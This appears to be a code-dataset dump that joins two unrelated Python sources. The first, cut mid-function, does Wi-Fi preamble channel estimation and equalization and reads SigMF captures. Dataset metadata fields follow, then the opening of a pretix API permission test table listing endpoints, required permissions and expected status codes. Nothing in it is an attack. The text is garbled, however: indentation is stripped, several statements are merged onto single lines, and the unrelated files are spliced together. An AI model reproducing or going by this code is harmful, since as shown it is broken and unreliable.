Stf_64 = np.sqrt(13/6)*np.array([0, 0, 0, 0, 0, 0, 0, 0, 1+1j, 0, 0, 0, -1-1j, 0, 0, 0, 1+1j, 0, 0, 0, -1-1j, 0, 0, 0, -1-1j, 0, 0, 0,
1+1j, 0, 0, 0, 0, 0, 0, 0, -1-1j, 0, 0, 0, -1-1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 0, 0, 0, 0])
Ltf = np.array([0, 0, 0, 0, 0, 0, 1, 1, -1, -1, 1, 1, -1, 1, -1, 1, 1, 1, 1, 1, 1, -1, -1, 1, 1, -1, 1, -1, 1, 1, 1,
1, 0, 1, -1, -1, 1, 1, -1, 1, -1, 1, -1, -1, -1, -1, -1, 1, 1, -1, -1, 1, -1, 1, -1, 1, 1, 1, 1, 0, 0, 0, 0, 0])
Ltf1_rx = fftshift(
fft(preamble[n_short+np.int(n_long/5):n_short+np.int(n_long/5 + n_long*2/5)]))
Ltf2_rx = fftshift(fft(preamble[n_short+np.int(n_long/5 + n_long*2/5):n_short+n_long]))
Ltf_mid_rx = fftshift(
fft(preamble[n_short + 2*L - np.int(L/2):n_short + 2*L+N - np.int(L/2)]))
Ltf_avg_rx = (Ltf1_rx + Ltf2_rx)/2
ind_all = np.arange(-32, 32) + (N//2)
H_hat = np.zeros((N)) + 1j*np.zeros((N))
H_hat[ind_all] = Ltf_avg_rx[ind_all]*Ltf
if verbose is True:
freq = np.arange(-32, 32)
H_hat_coarse = H_hat[ind_all]
h_hat_coarse = ifft(ifftshift(H_hat_coarse))
plt.figure(figsize=[10, 3])
plt.subplot(1, 2, 1)
plt.stem(freq, np.abs(H_hat_coarse))
plt.grid(True)
plt.title('Magnitude')
plt.xlabel('Frequency bin')
plt.subplot(1, 2, 2)
plt.stem(freq, np.angle(H_hat_coarse))
plt.title('Phase')
plt.xlabel('Frequency bin')
plt.suptitle('Coarse estimation'+label)
plt.grid(True)
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.93])
plt.figure(figsize=[10, 3])
plt.subplot(1, 2, 1)
plt.stem(np.abs(h_hat_coarse))
plt.title('Magnitude')
plt.xlabel('Time (in samples)')
plt.grid(True)
plt.subplot(1, 2, 2)
plt.stem(np.angle(h_hat_coarse))
plt.title('Phase')
plt.xlabel('Time (in samples)')
plt.grid(True)
plt.suptitle('Coarse estimation'+label)
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.93])
plt.show()
ind_guard = np.concatenate((np.arange(-32, -26), np.arange(27, 32))) + (N//2)
ind_null = np.concatenate(
(np.array([0]), np.arange(-(N//2), -32), np.arange(32, (N//2)))) + (N//2)
ind_pilots = np.array([-21, -7, 7, 21]) + (N//2)
mask_data = np.ones(N)
mask_data_pilots = np.ones(N)
mask_data[list(np.concatenate((ind_guard, ind_null, ind_pilots)))] = 0
mask_data_pilots[list(np.concatenate((ind_guard, ind_null)))] = 0
ind_all_all = np.arange(-(N//2), (N//2)) + N//2
ind_data = ind_all_all[mask_data == 1]
ind_data_pilots = ind_all_all[mask_data_pilots == 1]
Stf_1_eq = fftshift(fft(preamble[n_short-2*N:n_short-N]))
Stf_2_eq = fftshift(fft(preamble[n_short-N:n_short]))
Ltf_1_eq = fftshift(fft(preamble[n_short+n_long-2*N:n_short+n_long-N]))
Ltf_2_eq = fftshift(fft(preamble[n_short+n_long-N:n_short+n_long]))
Stf_1_eq[ind_data_pilots] /= (H_hat[ind_data_pilots]+0.001)
Stf_2_eq[ind_data_pilots] /= (H_hat[ind_data_pilots]+0.001)
Ltf_1_eq[ind_data_pilots] /= (H_hat[ind_data_pilots]+0.001)
Ltf_2_eq[ind_data_pilots] /= (H_hat[ind_data_pilots]+0.001)
Stf_1_eq[ind_guard] = 0
Stf_2_eq[ind_guard] = 0
Ltf_1_eq[ind_guard] = 0
Ltf_2_eq[ind_guard] = 0
Stf_1_eq[ind_null] = 0
Stf_2_eq[ind_null] = 0
Ltf_1_eq[ind_null] = 0
Ltf_2_eq[ind_null] = 0
if verbose is True:
Stf_1_eq_down = Stf_1_eq[ind_all]
Stf_2_eq_down = Stf_2_eq[ind_all]
Ltf_1_eq_down = Ltf_1_eq[ind_all]
Ltf_2_eq_down = Ltf_2_eq[ind_all]
plt.figure(figsize=[13, 4.8])
plt.subplot(1, 3, 1)
plt.scatter(Stf_1_eq_down.real, Stf_1_eq_down.imag)
plt.title('Equalized STF - 1')
plt.subplot(1, 3, 2)
plt.scatter(Stf_2_eq_down.real, Stf_2_eq_down.imag)
plt.title('Equalized STF - 2')
plt.subplot(1, 3, 3)
plt.scatter(Stf_64.real, Stf_64.imag)
plt.title('Actual STF')
plt.suptitle('Signal constellations')
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.93])
plt.figure(figsize=[13, 4.8])
plt.subplot(1, 3, 1)
plt.scatter(Ltf_1_eq_down.real, Ltf_1_eq_down.imag)
plt.title('Equalized LTF - 1')
plt.subplot(1, 3, 2)
plt.scatter(Ltf_2_eq_down.real, Ltf_2_eq_down.imag)
plt.title('Equalized LTF - 2')
plt.subplot(1, 3, 3)
plt.scatter(Ltf.real, Ltf.imag)
plt.title('Actual LTF')
plt.suptitle('Signal constellations')
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.93])
plt.show()
stf_1_eq = ifft(ifftshift(Stf_1_eq))
stf_2_eq = ifft(ifftshift(Stf_2_eq))
ltf_1_eq = ifft(ifftshift(Ltf_1_eq))
ltf_2_eq = ifft(ifftshift(Ltf_2_eq))
preamble_eq = np.concatenate(
(stf_1_eq[-(N//4):], stf_1_eq, stf_2_eq[-(N//4):], stf_2_eq, ltf_1_eq[-(N//2):], ltf_1_eq, ltf_2_eq))
elif fs == 20e6:
if preamble.size != 320:
raise Exception('Size of preamble is {}, but it should be 320.'.format(preamble.size))
n_short = 160
n_long = 160
Stf_64 = np.sqrt(13/6)*np.array([0, 0, 0, 0, 0, 0, 0, 0, 1+1j, 0, 0, 0, -1-1j, 0, 0, 0, 1+1j, 0, 0, 0, -1-1j, 0, 0, 0, -1-1j, 0, 0, 0,
1+1j, 0, 0, 0, 0, 0, 0, 0, -1-1j, 0, 0, 0, -1-1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 0, 0, 0, 0])
Ltf = np.array([0, 0, 0, 0, 0, 0, 1, 1, -1, -1, 1, 1, -1, 1, -1, 1, 1, 1, 1, 1, 1, -1, -1, 1, 1, -1, 1, -1, 1, 1, 1,
1, 0, 1, -1, -1, 1, 1, -1, 1, -1, 1, -1, -1, -1, -1, -1, 1, 1, -1, -1, 1, -1, 1, -1, 1, 1, 1, 1, 0, 0, 0, 0, 0])
L = 16
N = 64
Ltf1_rx = fftshift(
fft(preamble[n_short+np.int(n_long/5):n_short+np.int(n_long/5 + n_long*2/5)]))
Ltf2_rx = fftshift(fft(preamble[n_short+np.int(n_long/5 + n_long*2/5):n_short+n_long]))
Ltf_mid_rx = fftshift(
fft(preamble[n_short + 2*L - np.int(L/2):n_short + 2*L+N - np.int(L/2)]))
Ltf_avg_rx = (Ltf1_rx + Ltf2_rx)/2
AA = np.zeros((N, N)) + 0j
for m in range(N):
for n in range(L+1):
AA[m, n] = Ltf[m] * np.exp(-1j*2*np.pi*m*n/N)
A = AA[:, :L+1] * np.exp(1j*np.pi*np.arange(L+1)).reshape(1, -1)
ind_all = np.arange(-32, 32) + 32
ind_guard = np.concatenate((np.arange(-32, -26), np.arange(27, 32))) + 32
ind_null = np.array([0]) + 32
mask_data_pilots = np.ones(64)
mask_data_pilots[list(np.concatenate((ind_guard, ind_null)))] = 0
ind_data_pilots = ind_all[mask_data_pilots == 1]
h_hat_small, residuals, rank, singular_values = np.linalg.lstsq(
A[ind_data_pilots, :], Ltf_mid_rx[ind_data_pilots], rcond=None)
h_hat = np.zeros(N)+0j
h_hat[:L+1] = h_hat_small
H_hat = fftshift(fft(h_hat))
H_hat = Ltf_avg_rx*Ltf
if verbose is True:
freq = np.arange(-32, 32)
H_hat_coarse = Ltf_mid_rx*Ltf
h_hat_coarse = ifft(ifftshift(H_hat_coarse))
plt.figure(figsize=[10, 3])
plt.subplot(1, 2, 1)
plt.stem(freq, np.abs(H_hat_coarse))
plt.grid(True)
plt.title('Magnitude')
plt.xlabel('Frequency bin')
plt.subplot(1, 2, 2)
plt.stem(freq, np.angle(H_hat_coarse))
plt.title('Phase')
plt.xlabel('Frequency bin')
plt.suptitle('Coarse estimation')
plt.grid(True)
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.93])
plt.figure(figsize=[10, 3])
plt.subplot(1, 2, 1)
plt.stem(np.abs(h_hat_coarse))
plt.title('Magnitude')
plt.xlabel('Time (in samples)')
plt.grid(True)
plt.subplot(1, 2, 2)
plt.stem(np.angle(h_hat_coarse))
plt.title('Phase')
plt.xlabel('Time (in samples)')
plt.grid(True)
plt.suptitle('Coarse estimation')
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.93])
plt.figure(figsize=[10, 3])
plt.subplot(1, 2, 1)
plt.stem(freq, np.abs(H_hat))
plt.grid(True)
plt.title('Magnitude')
plt.xlabel('Frequency bin')
plt.subplot(1, 2, 2)
plt.stem(freq, np.angle(H_hat))
plt.title('Phase')
plt.xlabel('Frequency bin')
plt.suptitle('Frequency domain least squares estimation')
plt.grid(True)
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.9])
plt.figure(figsize=[10, 3])
plt.subplot(1, 2, 1)
plt.stem(np.abs(h_hat))
plt.title('Magnitude')
plt.xlabel('Time (in samples)')
plt.grid(True)
plt.subplot(1, 2, 2)
plt.stem(np.angle(h_hat))
plt.title('Phase')
plt.xlabel('Time (in samples)')
plt.grid(True)
plt.suptitle('Frequency domain least squares estimation')
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.9])
ind_all = np.arange(-32, 32) + 32
ind_guard = np.concatenate((np.arange(-32, -26), np.arange(27, 32))) + 32
ind_null = np.array([0]) + 32
ind_pilots = np.array([-21, -7, 7, 21]) + 32
mask_data = np.ones(64)
mask_data_pilots = np.ones(64)
mask_data[list(np.concatenate((ind_guard, ind_null, ind_pilots)))] = 0
mask_data_pilots[list(np.concatenate((ind_guard, ind_null)))] = 0
ind_data = ind_all[mask_data == 1]
ind_data_pilots = ind_all[mask_data_pilots == 1]
Stf_1_eq = fftshift(fft(preamble[n_short-2*N:n_short-N]))
Stf_2_eq = fftshift(fft(preamble[n_short-N:n_short]))
Ltf_1_eq = fftshift(fft(preamble[n_short+n_long-2*N:n_short+n_long-N]))
Ltf_2_eq = fftshift(fft(preamble[n_short+n_long-N:n_short+n_long]))
Stf_1_eq[ind_data_pilots] /= H_hat[ind_data_pilots]
Stf_2_eq[ind_data_pilots] /= H_hat[ind_data_pilots]
Ltf_1_eq[ind_data_pilots] /= H_hat[ind_data_pilots]
Ltf_2_eq[ind_data_pilots] /= H_hat[ind_data_pilots]
Stf_1_eq[ind_guard] = 0
Stf_2_eq[ind_guard] = 0
Ltf_1_eq[ind_guard] = 0
Ltf_2_eq[ind_guard] = 0
Stf_1_eq[ind_null] = 0
Stf_2_eq[ind_null] = 0
Ltf_1_eq[ind_null] = 0
Ltf_2_eq[ind_null] = 0
if verbose is True:
plt.figure(figsize=[13, 4.8])
plt.subplot(1, 3, 1)
plt.scatter(Stf_1_eq.real, Stf_1_eq.imag)
plt.title('Equalized STF - 1')
plt.subplot(1, 3, 2)
plt.scatter(Stf_2_eq.real, Stf_2_eq.imag)
plt.title('Equalized STF - 2')
plt.subplot(1, 3, 3)
plt.scatter(Stf_64.real, Stf_64.imag)
plt.title('Actual STF')
plt.suptitle('Signal constellations')
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.93])
plt.figure(figsize=[13, 4.8])
plt.subplot(1, 3, 1)
plt.scatter(Ltf_1_eq.real, Ltf_1_eq.imag)
plt.title('Equalized LTF - 1')
plt.subplot(1, 3, 2)
plt.scatter(Ltf_2_eq.real, Ltf_2_eq.imag)
plt.title('Equalized LTF - 2')
plt.subplot(1, 3, 3)
plt.scatter(Ltf.real, Ltf.imag)
plt.title('Actual LTF')
plt.suptitle('Signal constellations')
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.93])
plt.show()
stf_1_eq = ifft(ifftshift(Stf_1_eq))
stf_2_eq = ifft(ifftshift(Stf_2_eq))
ltf_1_eq = ifft(ifftshift(Ltf_1_eq))
ltf_2_eq = ifft(ifftshift(Ltf_2_eq))
preamble_eq = np.concatenate(
(stf_1_eq[-32:], stf_1_eq, stf_2_eq, ltf_1_eq[-32:], ltf_1_eq, ltf_2_eq))
return preamble_eq
def rms(x):
return np.sqrt(np.mean(x * np.conjugate(x)))
def shift_frequency(vector, freq_shift, fs):
t = np.arange(0, np.size(vector)) / fs
modulation = np.exp(-1j * 2 * np.pi * freq_shift * t) / np.sqrt(2)
return vector * modulation
def resample(vector, fs, dfs):
fs = int(round(fs)) dfs = int(round(dfs))
cfs = lcm(fs, dfs)
if cfs > fs:
vector = resampy.resample(vector, fs, cfs, filter='kaiser_best')
return resampy.resample(vector, cfs, dfs, filter='kaiser_best')
def lcm(a, b):
return a * int(b / fractions.gcd(a, b)) if a and b else 0
def get_sliding_window(x, window_size=10, stride=1, fs=200e6, fs_natural=20e6):
shape_ = x.shape
window_size_samples = np.int(window_size * (fs/fs_natural))
stride_samples = np.int(stride * (fs/fs_natural))
for i in tqdm(np.arange(0, shape_[1] - window_size_samples + stride_samples, stride_samples)):
if i == 0:
y = x[:, i:i + window_size_samples, :].copy()
else:
y = np.concatenate((y, x[:, i:i + window_size_samples, :]), axis=0)
return y
def read_wifi(files, base_data_directory, device_map, progress=True):
csv = files['csv_objects'].items()
if progress is True:
csv = tqdm(csv)
data_dict = dict(signal={}, device_key={}, sample_rate={}, capture_sample_rate={}, capture_frequency={}, capture_hw={},
center_frequency={}, freq_lower_edge={}, freq_upper_edge={},
reference_number={}, data_file={}, sample_start={}, sample_count={},
device_type={}, device_id={}, device_manufacturer={}
)
signal_index = 0
for file, signal_list in csv:
while file[0] == '/' or file[0] == '\\':
file = file[1:]
data_file = os.path.join(base_data_directory, file)
metadata_file = data_file.replace('sigmf-data', 'sigmf-meta')
all_signals = json.load(open(metadata_file))
capture = dict(capture_sample_rate=all_signals['global']['core:sample_rate'],
sample_rate=all_signals['global']['core:sample_rate'],
capture_hw=all_signals['global']['core:hw'],
capture_frequency=all_signals['capture'][0]['core:frequency'],
data_file=data_file)
for signal_name in signal_list:
for key, value in capture.items():
data_dict[key][signal_index] = value
capture_properties = all_signals['capture']
signal_properties = get_json_signal(
all_signals['annotations'], capture_properties[0], signal_name, type='wifi')
for key, value in signal_properties.items():
data_dict[key][signal_index] = value
device_id = signal_properties['device_id']
data_dict['device_key'][signal_index] = device_map[device_id]
filename = data_dict['data_file'][signal_index]
start_sample = data_dict['sample_start'][signal_index]
sample_count = data_dict['sample_count'][signal_index]
data, buffer_start, buffer_end = read_sample(
filename, start_sample, sample_count, desired_buffer=0)
data_dict['signal'][signal_index] = data
data_dict['center_frequency'][signal_index] = data_dict['capture_frequency'][signal_index]
signal_index = signal_index + 1
return data_dict
def parse_input_files(input_csv, devices_csv):
device_list = [] device_map = {} csv_objects = {}
with open(devices_csv) as devices_csv_file:
devices_reader = csv.reader(devices_csv_file, delimiter=',')
for device in devices_reader:
device_list.append(device[0])
for i, device in enumerate(device_list):
device_map[device] = i
with open(input_csv) as input_csv_file:
input_reader = csv.reader(input_csv_file, delimiter=',')
for row in input_reader:
csv_objects[row[0]] = row[1:]
return {'device_list': device_list,
'device_map': device_map,
'csv_objects': csv_objects}
def get_json_signal(json_annotations, capture, signal_id, type=None):
for signal in json_annotations:
if signal != {} and signal['capture_details:signal_reference_number'] == signal_id:
if 'rfml:label' in signal:
signal_label = signal['rfml:label']
if type is None:
type = signal_label[0]
else:
signal_label = tuple(None, None, None)
if type is None:
type = "unknown"
if type == "wifi":
return {'freq_lower_edge': signal['core:freq_lower_edge'],
'freq_upper_edge': signal['core:freq_upper_edge'],
'sample_start': signal['core:sample_start'],
'sample_count': signal['core:sample_count'],
'device_type': signal_label[0],
'device_manufacturer': signal_label[1],
'device_id': signal_label[2]}
elif type == "ADS-B":
return{'snr': signal['capture_details:SNRdB'],
'reference_number': signal['capture_details:signal_reference_number'],
'freq_lower_edge': capture['core:freq_lower_edge'],
'freq_upper_edge': capture['core:freq_upper_edge'],
'sample_start': signal['core:sample_start'],
'sample_count': signal['core:sample_count'],
'device_type': signal_label[0],
'device_id': signal_label[1]}
else:
print('Unknown signal type', type)
return None
return None
def read_sample(filename, start_sample, sample_count, desired_buffer):
buffer_start = min(desired_buffer, start_sample)
buffer_end = desired_buffer
sample_count += (buffer_start + buffer_end)
with open(filename, "rb") as f:
f.seek((start_sample - buffer_start) * 4)
raw = np.fromfile(f, dtype='int16', count=2*sample_count)
samples_read = int(raw.size / 2)
buffer_end -= (sample_count - samples_read)
array = raw.reshape([samples_read, 2])
array = array[:, 0] + 1j*array[:, 1]
return array, buffer_start, buffer_end
| true
| true
|
1c4940a471a05633b194d7313df6009ea37014ef
| 25,648
|
py
|
Python
|
src/tests/api/test_permissions.py
|
tixl/tixl
|
9f515a4b4e17a14d1990b29385475195438969be
|
[
"Apache-2.0"
] | null | null | null |
src/tests/api/test_permissions.py
|
tixl/tixl
|
9f515a4b4e17a14d1990b29385475195438969be
|
[
"Apache-2.0"
] | 8
|
2015-01-06T10:50:27.000Z
|
2015-01-18T18:38:18.000Z
|
src/tests/api/test_permissions.py
|
tixl/tixl
|
9f515a4b4e17a14d1990b29385475195438969be
|
[
"Apache-2.0"
] | null | null | null |
#
# This file is part of pretix (Community Edition).
#
# Copyright (C) 2014-2020 Raphael Michel and contributors
# Copyright (C) 2020-2021 rami.io GmbH and contributors
#
# This program is free software: you can redistribute it and/or modify it under the terms of the GNU Affero General
# Public License as published by the Free Software Foundation in version 3 of the License.
#
# ADDITIONAL TERMS APPLY: Pursuant to Section 7 of the GNU Affero General Public License, additional terms are
# applicable granting you additional permissions and placing additional restrictions on your usage of this software.
# Please refer to the pretix LICENSE file to obtain the full terms applicable to this work. If you did not receive
# this file, see <https://pretix.eu/about/en/license>.
#
# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more
# details.
#
# You should have received a copy of the GNU Affero General Public License along with this program. If not, see
# <https://www.gnu.org/licenses/>.
#
# This file is based on an earlier version of pretix which was released under the Apache License 2.0. The full text of
# the Apache License 2.0 can be obtained at <http://www.apache.org/licenses/LICENSE-2.0>.
#
# This file may have since been changed and any changes are released under the terms of AGPLv3 as described above. A
# full history of changes and contributors is available at <https://github.com/pretix/pretix>.
#
# This file contains Apache-licensed contributions copyrighted by: Ture Gjørup
#
# Unless required by applicable law or agreed to in writing, software distributed under the Apache License 2.0 is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under the License.
import time
import pytest
from django.test import override_settings
from django.utils.timezone import now
from pretix.base.models import Organizer
event_urls = [
(None, ''),
(None, 'categories/'),
('can_view_orders', 'invoices/'),
(None, 'items/'),
('can_view_orders', 'orders/'),
('can_view_orders', 'orderpositions/'),
(None, 'questions/'),
(None, 'quotas/'),
('can_view_vouchers', 'vouchers/'),
(None, 'subevents/'),
(None, 'taxrules/'),
('can_view_orders', 'waitinglistentries/'),
('can_view_orders', 'checkinlists/'),
]
event_permission_sub_urls = [
('get', 'can_change_event_settings', 'settings/', 200),
('patch', 'can_change_event_settings', 'settings/', 200),
('get', 'can_view_orders', 'revokedsecrets/', 200),
('get', 'can_view_orders', 'revokedsecrets/1/', 404),
('get', 'can_view_orders', 'orders/', 200),
('get', 'can_view_orders', 'orderpositions/', 200),
('delete', 'can_change_orders', 'orderpositions/1/', 404),
('post', 'can_change_orders', 'orderpositions/1/price_calc/', 404),
('get', 'can_view_vouchers', 'vouchers/', 200),
('get', 'can_view_orders', 'invoices/', 200),
('get', 'can_view_orders', 'invoices/1/', 404),
('post', 'can_change_orders', 'invoices/1/regenerate/', 404),
('post', 'can_change_orders', 'invoices/1/reissue/', 404),
('get', 'can_view_orders', 'waitinglistentries/', 200),
('get', 'can_view_orders', 'waitinglistentries/1/', 404),
('post', 'can_change_orders', 'waitinglistentries/', 400),
('delete', 'can_change_orders', 'waitinglistentries/1/', 404),
('patch', 'can_change_orders', 'waitinglistentries/1/', 404),
('put', 'can_change_orders', 'waitinglistentries/1/', 404),
('post', 'can_change_orders', 'waitinglistentries/1/send_voucher/', 404),
('get', None, 'categories/', 200),
('get', None, 'items/', 200),
('get', None, 'questions/', 200),
('get', None, 'quotas/', 200),
('get', None, 'discounts/', 200),
('post', 'can_change_items', 'items/', 400),
('get', None, 'items/1/', 404),
('put', 'can_change_items', 'items/1/', 404),
('patch', 'can_change_items', 'items/1/', 404),
('delete', 'can_change_items', 'items/1/', 404),
('post', 'can_change_items', 'categories/', 400),
('get', None, 'categories/1/', 404),
('put', 'can_change_items', 'categories/1/', 404),
('patch', 'can_change_items', 'categories/1/', 404),
('delete', 'can_change_items', 'categories/1/', 404),
('post', 'can_change_items', 'discounts/', 400),
('get', None, 'discounts/1/', 404),
('put', 'can_change_items', 'discounts/1/', 404),
('patch', 'can_change_items', 'discounts/1/', 404),
('delete', 'can_change_items', 'discounts/1/', 404),
('post', 'can_change_items', 'items/1/variations/', 404),
('get', None, 'items/1/variations/', 404),
('get', None, 'items/1/variations/1/', 404),
('put', 'can_change_items', 'items/1/variations/1/', 404),
('patch', 'can_change_items', 'items/1/variations/1/', 404),
('delete', 'can_change_items', 'items/1/variations/1/', 404),
('get', None, 'items/1/addons/', 404),
('get', None, 'items/1/addons/1/', 404),
('post', 'can_change_items', 'items/1/addons/', 404),
('put', 'can_change_items', 'items/1/addons/1/', 404),
('patch', 'can_change_items', 'items/1/addons/1/', 404),
('delete', 'can_change_items', 'items/1/addons/1/', 404),
('get', None, 'subevents/', 200),
('get', None, 'subevents/1/', 404),
('get', None, 'taxrules/', 200),
('get', None, 'taxrules/1/', 404),
('post', 'can_change_event_settings', 'taxrules/', 400),
('put', 'can_change_event_settings', 'taxrules/1/', 404),
('patch', 'can_change_event_settings', 'taxrules/1/', 404),
('delete', 'can_change_event_settings', 'taxrules/1/', 404),
('get', 'can_change_event_settings', 'sendmail_rules/', 200),
('get', 'can_change_event_settings', 'sendmail_rules/1/', 404),
('post', 'can_change_event_settings', 'sendmail_rules/', 400),
('put', 'can_change_event_settings', 'sendmail_rules/1/', 404),
('patch', 'can_change_event_settings', 'sendmail_rules/1/', 404),
('delete', 'can_change_event_settings', 'sendmail_rules/1/', 404),
('get', 'can_view_vouchers', 'vouchers/', 200),
('get', 'can_view_vouchers', 'vouchers/1/', 404),
('post', 'can_change_vouchers', 'vouchers/', 201),
('put', 'can_change_vouchers', 'vouchers/1/', 404),
('patch', 'can_change_vouchers', 'vouchers/1/', 404),
('delete', 'can_change_vouchers', 'vouchers/1/', 404),
('get', None, 'quotas/', 200),
('get', None, 'quotas/1/', 404),
('post', 'can_change_items', 'quotas/', 400),
('put', 'can_change_items', 'quotas/1/', 404),
('patch', 'can_change_items', 'quotas/1/', 404),
('delete', 'can_change_items', 'quotas/1/', 404),
('get', None, 'questions/', 200),
('get', None, 'questions/1/', 404),
('post', 'can_change_items', 'questions/', 400),
('put', 'can_change_items', 'questions/1/', 404),
('patch', 'can_change_items', 'questions/1/', 404),
('delete', 'can_change_items', 'questions/1/', 404),
('get', None, 'questions/1/options/', 404),
('get', None, 'questions/1/options/1/', 404),
('put', 'can_change_items', 'questions/1/options/1/', 404),
('patch', 'can_change_items', 'questions/1/options/1/', 404),
('delete', 'can_change_items', 'questions/1/options/1/', 404),
('post', 'can_change_orders', 'orders/', 400),
('patch', 'can_change_orders', 'orders/ABC12/', 404),
('post', 'can_change_orders', 'orders/ABC12/mark_paid/', 404),
('post', 'can_change_orders', 'orders/ABC12/mark_pending/', 404),
('post', 'can_change_orders', 'orders/ABC12/mark_expired/', 404),
('post', 'can_change_orders', 'orders/ABC12/mark_canceled/', 404),
('post', 'can_change_orders', 'orders/ABC12/approve/', 404),
('post', 'can_change_orders', 'orders/ABC12/deny/', 404),
('post', 'can_change_orders', 'orders/ABC12/extend/', 400),
('post', 'can_change_orders', 'orders/ABC12/create_invoice/', 404),
('post', 'can_change_orders', 'orders/ABC12/resend_link/', 404),
('post', 'can_change_orders', 'orders/ABC12/regenerate_secrets/', 404),
('get', 'can_view_orders', 'orders/ABC12/payments/', 404),
('get', 'can_view_orders', 'orders/ABC12/payments/1/', 404),
('get', 'can_view_orders', 'orders/ABC12/refunds/', 404),
('get', 'can_view_orders', 'orders/ABC12/refunds/1/', 404),
('post', 'can_change_orders', 'orders/ABC12/payments/1/confirm/', 404),
('post', 'can_change_orders', 'orders/ABC12/payments/1/refund/', 404),
('post', 'can_change_orders', 'orders/ABC12/payments/1/cancel/', 404),
('post', 'can_change_orders', 'orders/ABC12/refunds/1/cancel/', 404),
('post', 'can_change_orders', 'orders/ABC12/refunds/1/process/', 404),
('post', 'can_change_orders', 'orders/ABC12/refunds/1/done/', 404),
('get', 'can_view_orders', 'checkinlists/', 200),
('post', 'can_change_orders', 'checkinlists/1/failed_checkins/', 400),
('post', 'can_change_event_settings', 'checkinlists/', 400),
('put', 'can_change_event_settings', 'checkinlists/1/', 404),
('patch', 'can_change_event_settings', 'checkinlists/1/', 404),
('delete', 'can_change_event_settings', 'checkinlists/1/', 404),
('get', 'can_view_orders', 'checkinlists/1/positions/', 404),
('post', 'can_change_orders', 'checkinlists/1/positions/3/redeem/', 404),
('post', 'can_create_events', 'clone/', 400),
('get', 'can_view_orders', 'cartpositions/', 200),
('get', 'can_view_orders', 'cartpositions/1/', 404),
('post', 'can_change_orders', 'cartpositions/', 400),
('delete', 'can_change_orders', 'cartpositions/1/', 404),
('post', 'can_view_orders', 'exporters/invoicedata/run/', 400),
('get', 'can_view_orders', 'exporters/invoicedata/download/bc3f9884-26ee-425b-8636-80613f84b6fa/3cb49ae6-eda3-4605-814e-099e23777b36/', 404),
]
org_permission_sub_urls = [
('get', 'can_change_organizer_settings', 'settings/', 200),
('patch', 'can_change_organizer_settings', 'settings/', 200),
('get', 'can_change_organizer_settings', 'webhooks/', 200),
('post', 'can_change_organizer_settings', 'webhooks/', 400),
('get', 'can_change_organizer_settings', 'webhooks/1/', 404),
('put', 'can_change_organizer_settings', 'webhooks/1/', 404),
('patch', 'can_change_organizer_settings', 'webhooks/1/', 404),
('delete', 'can_change_organizer_settings', 'webhooks/1/', 404),
('get', 'can_manage_customers', 'customers/', 200),
('post', 'can_manage_customers', 'customers/', 201),
('get', 'can_manage_customers', 'customers/1/', 404),
('patch', 'can_manage_customers', 'customers/1/', 404),
('post', 'can_manage_customers', 'customers/1/anonymize/', 404),
('put', 'can_manage_customers', 'customers/1/', 404),
('delete', 'can_manage_customers', 'customers/1/', 404),
('get', 'can_manage_customers', 'memberships/', 200),
('post', 'can_manage_customers', 'memberships/', 400),
('get', 'can_manage_customers', 'memberships/1/', 404),
('patch', 'can_manage_customers', 'memberships/1/', 404),
('put', 'can_manage_customers', 'memberships/1/', 404),
('delete', 'can_manage_customers', 'memberships/1/', 404),
('get', 'can_change_organizer_settings', 'membershiptypes/', 200),
('post', 'can_change_organizer_settings', 'membershiptypes/', 400),
('get', 'can_change_organizer_settings', 'membershiptypes/1/', 404),
('patch', 'can_change_organizer_settings', 'membershiptypes/1/', 404),
('put', 'can_change_organizer_settings', 'membershiptypes/1/', 404),
('delete', 'can_change_organizer_settings', 'membershiptypes/1/', 404),
('get', 'can_manage_gift_cards', 'giftcards/', 200),
('post', 'can_manage_gift_cards', 'giftcards/', 400),
('get', 'can_manage_gift_cards', 'giftcards/1/', 404),
('put', 'can_manage_gift_cards', 'giftcards/1/', 404),
('patch', 'can_manage_gift_cards', 'giftcards/1/', 404),
('get', 'can_manage_gift_cards', 'giftcards/1/transactions/', 404),
('get', 'can_manage_gift_cards', 'giftcards/1/transactions/1/', 404),
('get', 'can_change_organizer_settings', 'devices/', 200),
('post', 'can_change_organizer_settings', 'devices/', 400),
('get', 'can_change_organizer_settings', 'devices/1/', 404),
('put', 'can_change_organizer_settings', 'devices/1/', 404),
('patch', 'can_change_organizer_settings', 'devices/1/', 404),
('get', 'can_change_teams', 'teams/', 200),
('post', 'can_change_teams', 'teams/', 400),
('get', 'can_change_teams', 'teams/{team_id}/', 200),
('put', 'can_change_teams', 'teams/{team_id}/', 400),
('patch', 'can_change_teams', 'teams/{team_id}/', 200),
('get', 'can_change_teams', 'teams/{team_id}/members/', 200),
('delete', 'can_change_teams', 'teams/{team_id}/members/2/', 404),
('get', 'can_change_teams', 'teams/{team_id}/invites/', 200),
('get', 'can_change_teams', 'teams/{team_id}/invites/2/', 404),
('delete', 'can_change_teams', 'teams/{team_id}/invites/2/', 404),
('post', 'can_change_teams', 'teams/{team_id}/invites/', 400),
('get', 'can_change_teams', 'teams/{team_id}/tokens/', 200),
('get', 'can_change_teams', 'teams/{team_id}/tokens/0/', 404),
('delete', 'can_change_teams', 'teams/{team_id}/tokens/0/', 404),
('post', 'can_change_teams', 'teams/{team_id}/tokens/', 400),
]
event_permission_root_urls = [
('post', 'can_create_events', 400),
('put', 'can_change_event_settings', 400),
('patch', 'can_change_event_settings', 200),
('delete', 'can_change_event_settings', 204),
]
@pytest.fixture
def token_client(client, team):
team.can_view_orders = True
team.can_view_vouchers = True
